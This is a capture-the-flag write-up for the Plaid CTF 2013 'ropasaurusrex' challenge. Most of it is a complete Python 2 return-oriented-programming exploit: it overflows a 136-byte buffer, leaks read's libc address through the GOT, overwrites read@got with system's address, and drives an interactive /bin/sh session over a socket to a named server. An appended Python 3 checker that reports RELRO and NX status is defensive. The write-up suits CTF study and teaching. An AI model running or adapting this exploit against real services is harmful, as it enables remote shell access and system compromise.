Plaid CTF 2013 ropasaurusrex (Hack/Pwnable, 2015. 9. 15. 06:09)
libc.so.6-f85c96c8fc753bfa75140c39501b4cd50779f43a
buf is 136 bytes.
buf plus sfp (the saved frame pointer) is 140 bytes, so the return address sits at offset 140.
read() pulls in 256 bytes, which leaves plenty of room to write the payload.
The offsets needed from libc can be found with readelf -s.
1. print read_got (write read@got back to us to leak read's resolved libc address)
2. read read_got (read system's address over read@got)
3. read_plt /bin/sh (call read@plt, which now resolves to system, with /bin/sh as the argument)
# Python 2 exploit script (str-based sockets, print statement, raw_input)
from socket import *
import time, struct

p = lambda x: struct.pack("<L", x)      # pack a 32-bit little-endian value
up = lambda x: struct.unpack("<L", x)   # unpack one

HOST = "server.stria.me"
PORT = 12345
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))

# offsets and addresses used by the chain
libc_system = 0x00039450   # system() offset in the libc above (not used directly; see 'address')
ppppr = 0x080484B5         # pop;pop;pop;pop;ret gadget (not used)
pppr = 0x080484B6          # pop;pop;pop;ret gadget, clears three arguments off the stack
write_got = 0x8049614
write_plt = 0x0804830C
read_got = 0x804961C
read_plt = 0x0804832C
bss = 0x08049628           # writable scratch area that will hold "/bin/sh"
binsh = "/bin/sh"
address = 0x9aa40          # distance from read to system in this libc (read offset minus system offset)

# fd 1 is used for every call; the script relies on the service's stdout being the same socket as its stdin
payload = "\x90" * 140                                   # fill buf (136) + sfp (4)
# 1. read(1, bss, 8): pull "/bin/sh\n" into .bss
payload += p(read_plt) + p(pppr) + p(1) + p(bss) + p(8)
# 2. write(1, read_got, 4): leak read's resolved libc address
payload += p(write_plt) + p(pppr) + p(1) + p(read_got) + p(4)
# 3. read(1, read_got, 4): overwrite read@got with system's address
payload += p(read_plt) + p(pppr) + p(1) + p(read_got) + p(4)
# 4. read@plt now jumps to system; dummy return address, argument is bss ("/bin/sh")
payload += p(read_plt) + p(0x12345678) + p(bss)

s.send(payload + "\n")        # 212 bytes plus newline, fits in the 256-byte read
s.send(binsh + "\n")          # consumed by step 1 (8 bytes)
recv = s.recv(4)              # the 4 bytes leaked by step 2
addr = up(recv[0:4])[0]
print hex(addr)
system_plt = addr - address   # system's libc address (leaked read address minus the read->system distance)
print hex(system_plt)
s.send(p(system_plt) + "\n")  # consumed by step 3 (4 bytes); step 4 then runs system("/bin/sh")
time.sleep(0.5)
while True:                   # simple interactive loop over the spawned shell
    cmd = raw_input("$")
    s.send(cmd + "\n")
    print s.recv(1024)
s.close()
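Step 3 of the chain only works because read@got is still writable when the overwrite lands, and the chain is built from gadgets rather than injected shellcode because the stack is not executable. As an added example (not part of this writeup and not the challenge's own code), the Python 3 checker below reads an ELF's program headers and .dynamic segment and reports the RELRO level and whether the stack is non-executable, the two mitigations that decide whether this kind of GOT overwrite and return chain is possible: Partial RELRO (PT_GNU_RELRO alone) still leaves lazily bound entries such as read@got writable, and only Full RELRO (PT_GNU_RELRO plus BIND_NOW) makes them read-only before main runs. The ELF constants are from elf.h, only little-endian images are handled, and the sample images returned by build_sample_elf32 are constructed here (headers and a .dynamic blob only) so the checks can be exercised offline; run the script with a binary path as its argument to check a real file.

```python
import struct
import sys

# ELF constants from elf.h (this checker is an added example, not part of the writeup)
PT_DYNAMIC = 2
PT_GNU_STACK = 0x6474E551
PT_GNU_RELRO = 0x6474E552
PF_X = 0x1
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW = 0x8, 0x1
ELFCLASS32, ELFCLASS64 = 1, 2


def program_headers(data):
    """Yield one dict per program header of a little-endian ELF32/ELF64 image."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    if data[4] == ELFCLASS32:
        e_phoff = struct.unpack_from("<I", data, 28)[0]
        e_phentsize, e_phnum = struct.unpack_from("<HH", data, 42)
        fmt = "<8I"    # Elf32_Phdr field order
        names = ("type", "offset", "vaddr", "paddr", "filesz", "memsz", "flags", "align")
    elif data[4] == ELFCLASS64:
        e_phoff = struct.unpack_from("<Q", data, 32)[0]
        e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
        fmt = "<2I6Q"  # Elf64_Phdr puts p_flags second
        names = ("type", "flags", "offset", "vaddr", "paddr", "filesz", "memsz", "align")
    else:
        raise ValueError("unsupported ELF class")
    for i in range(e_phnum):
        fields = struct.unpack_from(fmt, data, e_phoff + i * e_phentsize)
        yield dict(zip(names, fields))


def dynamic_tags(data, phdr):
    """Return {d_tag: d_val} for the PT_DYNAMIC segment described by phdr."""
    fmt = "<iI" if data[4] == ELFCLASS32 else "<qQ"
    step = struct.calcsize(fmt)
    tags = {}
    for off in range(phdr["offset"], phdr["offset"] + phdr["filesz"], step):
        tag, val = struct.unpack_from(fmt, data, off)
        if tag == DT_NULL:
            break
        tags[tag] = val
    return tags


def relro_level(data):
    """'none', 'partial' or 'full', with the usual checksec meaning."""
    phdrs = list(program_headers(data))
    if not any(p["type"] == PT_GNU_RELRO for p in phdrs):
        return "none"          # GOT stays writable for the whole run
    dyn = next((p for p in phdrs if p["type"] == PT_DYNAMIC), None)
    tags = dynamic_tags(data, dyn) if dyn else {}
    bind_now = (DT_BIND_NOW in tags
                or tags.get(DT_FLAGS, 0) & DF_BIND_NOW
                or tags.get(DT_FLAGS_1, 0) & DF_1_NOW)
    # Without BIND_NOW the lazily resolved GOT (e.g. read@got) is left writable.
    return "full" if bind_now else "partial"


def nx_enabled(data):
    """True when PT_GNU_STACK is present without PF_X, i.e. the stack is non-executable."""
    for p in program_headers(data):
        if p["type"] == PT_GNU_STACK:
            return not (p["flags"] & PF_X)
    return False   # no PT_GNU_STACK: the loader falls back to an executable stack


def build_sample_elf32(relro, bind_now, exec_stack):
    """Constructed ELF32 image (headers and a .dynamic blob only) for offline testing."""
    dyn = [(DT_FLAGS, DF_BIND_NOW)] if bind_now else []
    dyn_blob = b"".join(struct.pack("<iI", t, v) for t, v in dyn + [(DT_NULL, 0)])
    dyn_off = 52 + 3 * 32     # ELF header, then room for three program headers
    phdrs = [(PT_DYNAMIC, dyn_off, 0, 0, len(dyn_blob), len(dyn_blob), 0x6, 4),
             (PT_GNU_STACK, 0, 0, 0, 0, 0, 0x6 | (PF_X if exec_stack else 0), 16)]
    if relro:
        phdrs.append((PT_GNU_RELRO, 0, 0, 0, 0, 0, 0x4, 1))
    ident = b"\x7fELF" + bytes([ELFCLASS32, 1, 1]) + b"\x00" * 9
    ehdr = ident + struct.pack("<HHIIIIIHHHHHH", 3, 3, 1, 0, 52, 0, 0, 52, 32, len(phdrs), 40, 0, 0)
    table = b"".join(struct.pack("<8I", *p) for p in phdrs)
    table += b"\x00" * (dyn_off - 52 - len(table))   # pad to where PT_DYNAMIC points
    return ehdr + table + dyn_blob


if __name__ == "__main__":
    image = open(sys.argv[1], "rb").read()
    print("RELRO: %s, NX: %s" % (relro_level(image), nx_enabled(image)))
```

The RELRO decision mirrors what checksec-style tools do: PT_GNU_RELRO says the loader will remap .dynamic and the relocated part of the GOT read-only, but the lazy PLT entries are only included in that region when BIND_NOW forces them to be resolved first, which is why the chain above can still write over read@got on a Partial RELRO binary.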